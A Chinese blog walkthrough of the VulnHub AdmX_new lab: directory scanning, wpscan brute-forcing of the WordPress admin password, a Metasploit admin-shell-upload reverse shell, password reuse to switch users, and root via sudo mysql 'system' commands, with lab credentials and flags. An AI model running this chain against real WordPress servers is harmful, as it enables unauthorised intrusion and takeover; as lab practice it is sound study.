PENETRATION第一步

第一次去打靶机,本来都快成功了,电脑蓝屏警告了。。。(=_=)

靶机下载连接

(https://download.vulnhub.com/admx/AdmX_new.7z)

信息收集

nmap扫描

.

开启了80端口,打开看一下,是ubuntu



扫一下目录

dirb http://192.168.254.159 /usr/share/wordlists/dirb/big.txt

发现有wordpress。



直接上wpscan,扫描一下。

wpscan  --url http://192.168.0.210/wordpress --enumerate u



发现了admin,利用wpscan对密码进行爆破,得到密码adam14

wpscan  --url http://192.168.0.210/wordpress -U admin -P /usr/share/wordlists/rockyou.txt

反弹shell

利用msfconsole,search wp_admin_shell_upload

show options看一看设置哪些部分

set username admin

set password adam14

set rhosts 192.168.0.210

set targeturi /wordpress

设置完后直接run起来,过一会反弹shell。



输入shell

meterpreter > shell
Process 1992 created.
Channel 0 created.
sh: 0: getcwd() failed: No such file or directory
sh: 0: getcwd() failed: No such file or directory

看一下id

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

找第一个flag

cd  /home

看目录下文件

ls

有wpadmin

cd /home/wpadmin
ls
cat local.txt

但是权限不够

cat: local.txt: Permission denied

所以登录wpadmin,进行读取

su wpadmin
Password: adam14
id
uid=1001(wpadmin) gid=1001(wpadmin) groups=1001(wpadmin)

已经是wpadmin,现在进入目录下,读取local.txt

cd /home/wpadmin
ls
local.txt
cat local.txt 153495edec1b606c24947b1335998bd9

查找第二个,在root下面,但是

cd /root
bash: line 5: cd: /root: Permission denied

所以再次提权

cat wp-config.php

能看到数据库密码Wp_Admin#123

define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'admin' );
define( 'DB_PASSWORD', 'Wp_Admin#123' );
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8mb4' );
define( 'DB_COLLATE', '' );

登录(在交互式界面下)

/bin/sh -i
$ sudo /usr/bin/mysql -u root -D wordpress -p

密码就是Wp_Admin#123

登陆后,查看id是否是root。

$ system id
uid=0(root) gid=0(root) groups=0(root)

进入root文件夹下,寻找文件

$ system cd /root
$ system ls -lha /root
total 36K
drwx------ 5 root root 4.0K May 8 13:42 .
drwxr-xr-x 20 root root 4.0K May 8 11:55 ..
lrwxrwxrwx 1 root root 9 May 8 13:40 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
drwx------ 2 root root 4.0K May 8 13:42 .cache
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-r-------- 1 root root 33 May 8 13:40 proof.txt
drwxr-xr-x 3 root root 4.0K May 8 12:11 snap
drwx------ 2 root root 4.0K May 8 12:11 .ssh
-rw-r--r-- 1 root root 227 May 8 13:40 .wget-hsts

打开proof.txt,第二个flag

$ system cat /root/proof.txt
7efd721c8bfff2937c66235f2d0dbac1

PENETRATION第一步的更多相关文章

  1. 开发thinkphp的第一步就是给Application目录(不包括其下的文件)777权限, 关闭selinux

    开发thinkphp的时候, 总是会出现各种个样 的奇怪的毛病, 比如: 说什么Application目录不可写, 比如: 说什么 _STORAGE_WRITE_ERROR, 不能生成 Runtime ...

  2. ElasticSearch第一步-环境配置

    ElasticSearch第一步-环境配置 ElasticSearch第二步-CRUD之Sense ElasticSearch第三步-中文分词 ElasticSearch第四步-查询详解 Elasti ...

  3. Scala的第一步

    第一步:学习使用Scala解释器 开始Scala最简单的方法是使用Scala解释器,它是一个编写Scala表达式和程序的交互式“shell”.在使用Scala之前需要安装Scala,可以参考 Firs ...

  4. UE4蓝图编程的第一步

    认识UE4蓝图中颜色与变量类型: UE4中各个颜色对应着不同的变量,连接点和连线的颜色都在表示此处是什么类型的变量.对于初学者来说一开始看到那么多连接点, 可能会很茫然,搞不清还怎么连,如果知道了颜色 ...

  5. STM32F407第一步之点亮LED

    STM32F407第一步之点亮LED. 要点亮LED,首先了解一下F4的GPIO模块.首先看一下STM32F4数据手册,GPIO模块的内部结构图 看上去有点复杂,不要怕,慢慢理解就可以了.对外引脚那里 ...

  6. 重制AdvanceWars第一步 -- 搞定地图

    首先来聊下高级战争吧Advance Wars,由任天堂旗下的Intelligent Systems开发的战棋游戏.初作诞生于GBA上,后来继续跟进了高战2黑洞崛,而后在下一代掌机DS上也出了三代续作高 ...

  7. 高德携手阿里云发布“LBS云”,账户打通只是第一步

    位置.游戏.视频,是公认的基于云计算的三大移动端应用方向.而今,LBS云有了更多进展,在高价值应用与云平台之间实现了资源打通和融合,高德迈出了实质性的一步. 高德地图副总裁郄建军(左)与阿里云业务总经 ...

  8. 005.TCP--拼接TCP头部IP头部,实现TCP三次握手的第一步(Linux,原始套接字)

    一.目的: 自己拼接IP头,TCP头,计算效验和,将生成的报文用原始套接字发送出去. 若使用tcpdump能监听有对方服务器的包回应,则证明TCP报文是正确的! 二.数据结构: TCP首部结构图: s ...

  9. Theano2.1.2-基础知识之第一步:代数

    来自:http://deeplearning.net/software/theano/tutorial/adding.html Baby Steps - Algebra 一.两个标量相加 在学习the ...

随机推荐

  1. 【知识详解】Https详解

    Https详解 1.什么是Https Http + SSL = Https 一句话说:Https是身披SSL的Http,当使用了SSL后,Http先和SSL通信,再由SSL和TCP通信, 2.为什么需 ...

  2. 又一本springmvc学习指南 之---第22篇 springmvc 加载.xml文件的bean标签的过程

    writedby 张艳涛,今天看spring mvc 学习指南的第2章,特意提下这个作者是how tomcat works 俩个作者之一, 喜欢上一本书的风格,使用案例来讲述原理, 在做第一个案例的时 ...

  3. document.all("div).style.display = "none"与 等于""的区别

    <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...

  4. TensorFlow模型部署到服务器---TensorFlow2.0

    前言 ​ 当一个TensorFlow模型训练出来的时候,为了投入到实际应用,所以就需要部署到服务器上.由于我本次所做的项目是一个javaweb的图像识别项目.所有我就想去寻找一下java调用Tenso ...

  5. 《笨方法学python》随笔

    字符串 字符串可以包含格式化字符%s,只要将格式化的变量放到字符串中,再紧跟着一个百分号 %(percent), 再紧跟着变量名即可.唯一要注意的地方是, 如果你想要在字符串中通过格式化字符放入多个变 ...

  6. 过渡——transition

    ① 设置参与过渡的属性 transition-property:  ;      all / transform / 参与过渡的属性 ② 设置过渡的时长 transition-duration:  s ...

  7. 在Java开发工具的project中使用相对路径

    1.在project中,相对路径的根目录是project的根文件夹,在此就是repathtest文件夹了.创建文件的写法是: File f = new File("src/com/lavas ...

  8. C语言中变参函数传参探究

    背景引入 近期在看一本书,叫做<嵌入式C语言自我修养>,写的内容对我帮助很大,是一本好书.在第6章,GNU C编译器扩展语法精讲一节,这本书给出了一些变参函数的例子: //1.变参函数初体 ...

  9. 走心的中级Android工程师跳槽经验分享

    这些经验是我最近四个月,从准备面试到找到合适工作的汗水和泪水,希望对你们能有帮助! define 跳槽 跳槽前要思考的问题 钱不到位怎么办 心委屈怎么办 离职前的思考 确定要走时需要做的准备 行情怎么 ...

  10. 雪花算法ID在前端丢失精度解决方案

    首先说一下背景,目前笔者的工作是物联网方面的,设备有对应的智慧运营平台,平台开发中建表的主键用的是Mybatis plus默认的雪花算法来生成的,也就是分布式系统比较常用的雪花ID,技术栈就是常用的S ...